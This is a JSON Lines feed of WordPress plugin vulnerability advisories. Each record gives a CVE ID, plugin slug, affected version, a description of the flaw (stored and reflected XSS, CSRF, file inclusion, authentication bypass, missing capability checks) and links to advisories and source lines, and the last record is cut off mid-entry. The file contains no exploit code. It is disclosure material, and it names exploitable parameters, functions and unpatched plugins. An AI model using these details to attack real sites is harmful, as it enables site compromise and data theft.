{"CVE_ID":"CVE-2024-8858","slug":"addons-for-elementor","versionImpact":"8.5","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018piechart_settings\u2019 parameter in all versions up to, and including, 8.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3c2e5fe-cc02-479e-9f33-e1a783088596?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3c2e5fe-cc02-479e-9f33-e1a783088596?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/piecharts\\\/loop.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/piecharts\\\/loop.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153346\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153346\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8921","slug":"zita-site-library","versionImpact":"1.6.3","description":"The Zita Elementor Site Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc1c76ee-078d-4c9a-a4d3-063d9147d7e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc1c76ee-078d-4c9a-a4d3-063d9147d7e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/importer\\\/wxr-importer.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/importer\\\/wxr-importer.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/inc\\\/importer.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/inc\\\/importer.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zita-site-library\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zita-site-library\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpzita.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpzita.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168327\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168327\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10898","slug":"cf7-email-add-on","versionImpact":"1.9","description":"The Contact Form 7 Email Add on plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the cf7_email_add_on_add_admin_template() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php files can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-email-add-on\\\/trunk\\\/include\\\/class-cf7-email.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-email-add-on\\\/trunk\\\/include\\\/class-cf7-email.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82efaa3-ea61-476c-ad1a-60585450c63a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82efaa3-ea61-476c-ad1a-60585450c63a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12113","slug":"youzify","versionImpact":"1.3.2","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_user_review() and delete_review() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete other user's reviews.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977e407c-0650-454f-98bd-b39bb8c8c61f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977e407c-0650-454f-98bd-b39bb8c8c61f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13678","slug":"r3w-instafeed","versionImpact":"1.0","description":"The R3W InstaFeed WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba759796-a152-4f13-a474-f0368b4bc1f6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba759796-a152-4f13-a474-f0368b4bc1f6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1401","slug":"wp-click-info","versionImpact":"2.7.4","description":"The WP Click Info WordPress plugin through 2.7.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072620a2-76db-49d2-aae5-1170c409f7e7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072620a2-76db-49d2-aae5-1170c409f7e7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4198","slug":"alink-tap","versionImpact":"1.3.1","description":"The Alink Tap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the 'alink-tap' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alink-tap\\\/trunk\\\/admin\\\/views\\\/admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alink-tap\\\/trunk\\\/admin\\\/views\\\/admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alink-tap\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alink-tap\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c856e06d-34f7-42e9-a72c-3d4e9207e07e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c856e06d-34f7-42e9-a72c-3d4e9207e07e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4584","slug":"irm-newsroom","versionImpact":"1.2.17","description":"The IRM Newsroom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irmeventlist' shortcode in all versions up to, and including, 1.2.17 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3895df7a-9f24-45a5-b447-16f214cfbfcc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3895df7a-9f24-45a5-b447-16f214cfbfcc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7661","slug":"martinus-partnersky-system","versionImpact":"1.7.1","description":"The Partnersk\u00fd syst\u00e9m Martinus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'martinus' shortcode in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/martinus-partnersky-system\\\/tags\\\/1.7.1\\\/martinus-pp.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/martinus-partnersky-system\\\/tags\\\/1.7.1\\\/martinus-pp.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6500b559-4c26-47e8-b131-100ece3ca3bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6500b559-4c26-47e8-b131-100ece3ca3bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5844","slug":"radius-blocks","versionImpact":"2.2.1","description":"The Radius Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018subHeadingTagName\u2019 parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radius-blocks\\\/tags\\\/2.2.1\\\/templates\\\/blocks\\\/advanced-heading\\\/layout.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radius-blocks\\\/tags\\\/2.2.1\\\/templates\\\/blocks\\\/advanced-heading\\\/layout.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radius-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radius-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff41796a-0ba8-468f-8b79-274064da154e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff41796a-0ba8-468f-8b79-274064da154e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36713","slug":"mstore-api","versionImpact":"2.1.5","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.1.5. This is due to unrestricted access to the 'register' and 'update_user_profile' routes. This makes it possible for unauthenticated attackers to create new administrator accounts, delete existing administrator accounts, or escalate privileges on any account.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-mstore-api-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-mstore-api-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mstore-api-security-bypass-2-1-5\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mstore-api-security-bypass-2-1-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934c3ce9-cf2d-4bf6-9a34-f448cb2e5a1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934c3ce9-cf2d-4bf6-9a34-f448cb2e5a1d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5085","slug":"advanced-menu-widget","versionImpact":"0.4.1","description":"The Advanced Menu Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'advMenu' shortcode in versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-menu-widget\\\/trunk\\\/class-advanced-menu-widget.php?rev=1471917#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-menu-widget\\\/trunk\\\/class-advanced-menu-widget.php?rev=1471917#L74\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5da2dac6-940c-419e-853f-6cfd5d53d427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5da2dac6-940c-419e-853f-6cfd5d53d427?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1397","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on the 'titleTag' user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/cta\\\/index.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/cta\\\/index.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/info-box\\\/index.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/info-box\\\/index.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/section-title\\\/index.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/section-title\\\/index.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/team\\\/index.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/team\\\/index.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/testimonial\\\/index.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/testimonial\\\/index.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/accordion-card\\\/index.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/accordion-card\\\/index.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3943","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_addcomment function. This makes it possible for unauthenticated attackers to add comments to to do items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f6bd7-f57f-4725-a36f-9846ac04f945?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f6bd7-f57f-4725-a36f-9846ac04f945?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3754","slug":"alemha-watermark","versionImpact":"1.3.1","description":"The Alemha watermarker WordPress plugin through 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6f3e3e-3047-4446-a190-750a60c29fa3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6f3e3e-3047-4446-a190-750a60c29fa3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3608","slug":"product-designer","versionImpact":"1.0.33","description":"The Product Designer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the product_designer_ajax_delete_attach_id() function in all versions up to, and including, 1.0.33. This makes it possible for unauthenticated attackers to delete arbitrary attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f127fe5-67b8-40e1-a916-c607410b08b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f127fe5-67b8-40e1-a916-c607410b08b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-designer\\\/trunk\\\/includes\\\/designer-function.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-designer\\\/trunk\\\/includes\\\/designer-function.php#L412\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9444","slug":"element-ready-lite","versionImpact":"6.4.3","description":"The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bea7a4d0-d589-420b-a4ff-eaccf12e623b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bea7a4d0-d589-420b-a4ff-eaccf12e623b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/helper_functions.php#L1559\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/helper_functions.php#L1559\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167864\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167864\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12076","slug":"brid-video-easy-publish","versionImpact":"3.8.3","description":"The Target Video Easy Publish plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.3. This is due to missing or incorrect nonce validation on the resync_carousel(), seek_snapshot(), uploaded_cc(), and remove_cc() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1169\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1185\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1185\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L465\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L465\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/192b8ab0-f80e-4c0e-9cc0-df567d5791a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/192b8ab0-f80e-4c0e-9cc0-df567d5791a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13669","slug":"calendapp","versionImpact":"1.1","description":"The CalendApp WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71e69cf2-7d41-479c-9721-662b57571c90\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71e69cf2-7d41-479c-9721-662b57571c90\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13891","slug":"schedule","versionImpact":"1.0.0","description":"The Schedule WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c8b73c-3a29-4a66-9b2e-f24b5c2769ac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c8b73c-3a29-4a66-9b2e-f24b5c2769ac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4188","slug":"advanced-reorder-image-text-slider","versionImpact":"1.0","description":"The Advanced Reorder Image Text Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'reorder-simple-image-text-slider-setting' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a 